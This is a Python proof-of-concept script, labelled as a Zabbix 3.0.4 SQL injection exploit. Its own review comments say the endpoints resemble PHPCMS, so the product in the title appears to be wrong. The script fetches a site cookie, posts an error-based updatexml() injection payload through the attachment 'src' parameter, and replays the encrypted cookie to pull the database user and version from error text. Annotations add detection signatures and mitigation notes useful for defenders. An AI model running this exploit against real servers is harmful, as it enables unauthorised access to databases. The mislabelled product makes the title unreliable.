Zabbix V3.0.4 SQL injection PoC

#!/usr/bin/dev python
# -*- coding:utf-8 -*-
# author: Lion Ei'Jonson
# date:2017/9/21

import sys
import requests
import re
import urllib

def useage():
    """Print the one-line command-line usage hint for this script."""
    script_name = sys.argv[0]
    print("[*]Useage: python %s http://www.lioneijonson.cn" % script_name)

def mix_payload(url,userid):
    """POST a crafted ``src`` query value and return the cookie the server sets in reply.

    Args:
        url: ``index.php`` URL of the host being checked.
        userid: Value sent as the ``userid_flash`` form field.

    Returns:
        The value of the last response cookie whose name contains
        ``_att_json``.

    Raises:
        UnboundLocalError: if no response cookie name contains ``_att_json``
            (``attack_payload`` is never assigned in that case), so a crash
            here is not evidence that the host is patched.

    NOTE(review): the ``m=``/``c=``/``a=`` routing and the ``swfupload_json``
    action do not look like Zabbix's frontend and resemble PHPCMS instead.
    Confirm the affected product before scoping assets or writing detections
    from the page title.
    """
    # Error-based probe: updatexml() is given a non-XPath string built from
    # user() and version(), so the database error message carries those values.
    # The hex literals decode to the labels "user", ":", "," and "version".
    # Detection: `updatexml(` inside a request parameter is a stable signature.
    sql = 'updatexml(1,concat(1,(select concat(0x75736572,0x3a,user(),0x2c,0x76657273696f6e,0x3a,version()))),1)#'
    data = {'userid_flash': userid}
    payload = '&id=%*27 and ' + sql + '&m=1&modelid=2&f=test&catid=7&'
    # The whole payload is URL-quoted and appended as the `src` query parameter.
    url = url + '?m=attachment&c=attachments&a=swfupload_json&aid=1&src=' + urllib.parse.quote(payload)
    content = requests.post(url,data=data)
    for cookie in content.cookies:
        if '_att_json' in cookie.name:
            # The script treats this cookie value as the server-encrypted form
            # of the submitted `src` value and reuses it later as `a_k`.
            print("[*]payload is encrypt")
            attack_payload = cookie.value
    return attack_payload

def get_result(url):
    """Send the cookie value from ``mix_payload`` back as ``a_k`` and return the response.

    Args:
        url: ``index.php`` URL of the host being checked.

    Returns:
        The ``requests`` response object for the GET request.

    Note:
        ``userid`` is not a parameter; it is read from module scope, where the
        ``__main__`` block assigns it. Calling this function before that
        assignment raises ``NameError``.
    """
    get_params = {
        'm':'content',
        'c':'down',
        # Value returned by the attachment endpoint, replayed unchanged.
        'a_k':mix_payload(url,userid)
    }
    respon = requests.get(url,params=get_params)
    return respon

# Entry point: check the single host named on the command line and print
# whether the database error marker is reflected in the HTTP response.
# NOTE(review): every exit path uses sys.exit() with no argument and the
# "vulnerable" path falls off the end, so the process exit status is 0 in all
# cases; automation wrapping this script cannot tell the outcomes apart by
# exit code.
if __name__ == '__main__':
    if len(sys.argv) != 2:
        useage()
        sys.exit()
    # Prefix check only: an argument not starting with "http" gets "http://"
    # prepended; "/index.php" is appended in both branches.
    if(sys.argv[1][:4]) != "http":
        url = "http://" + sys.argv[1] + "/index.php"
    else:
        url = sys.argv[1] + "/index.php"
    get_params = {
        'm':'wap',
        'c':'index',
        'siteid':'1',
    }
    try:
        content = requests.get(url,params=get_params)
    # Bare except: any exception (including KeyboardInterrupt) is reported as
    # "not available".
    except:
        print("[!]Target is not available")
        sys.exit()
    # NOTE(review): the else branch exits on the first cookie whose name lacks
    # '_siteid', and an empty cookie jar leaves `userid` unassigned (NameError
    # later in get_result). Neither outcome says anything about whether the
    # host is patched.
    for cookie in content.cookies:
        if '_siteid' in cookie.name:
            print("[*]Find the cookie_userid")
            # Module-level name; get_result() reads it from module scope.
            userid = cookie.value
        else:
            print("[!]Can't find the cookie")
            sys.exit()
    # The verdict rests on the literal "XPATH syntax error:" text appearing in
    # the response body, i.e. on the application returning database error text
    # to the client. Detection: alert on that string in HTTP responses.
    # Mitigation: suppress database error output and fix the query handling.
    match = re.search(r"XPATH syntax error: '(\S+)'",get_result(url).content.decode('utf-8'))
    if match:
        print("[*]The target is vulnerable")
        print(match.group(1))
    else:
        # Absence of the marker also occurs when errors are simply not
        # displayed, so this branch is not proof of a fix.
        print("[!]The target is not vulnerable")
        sys.exit()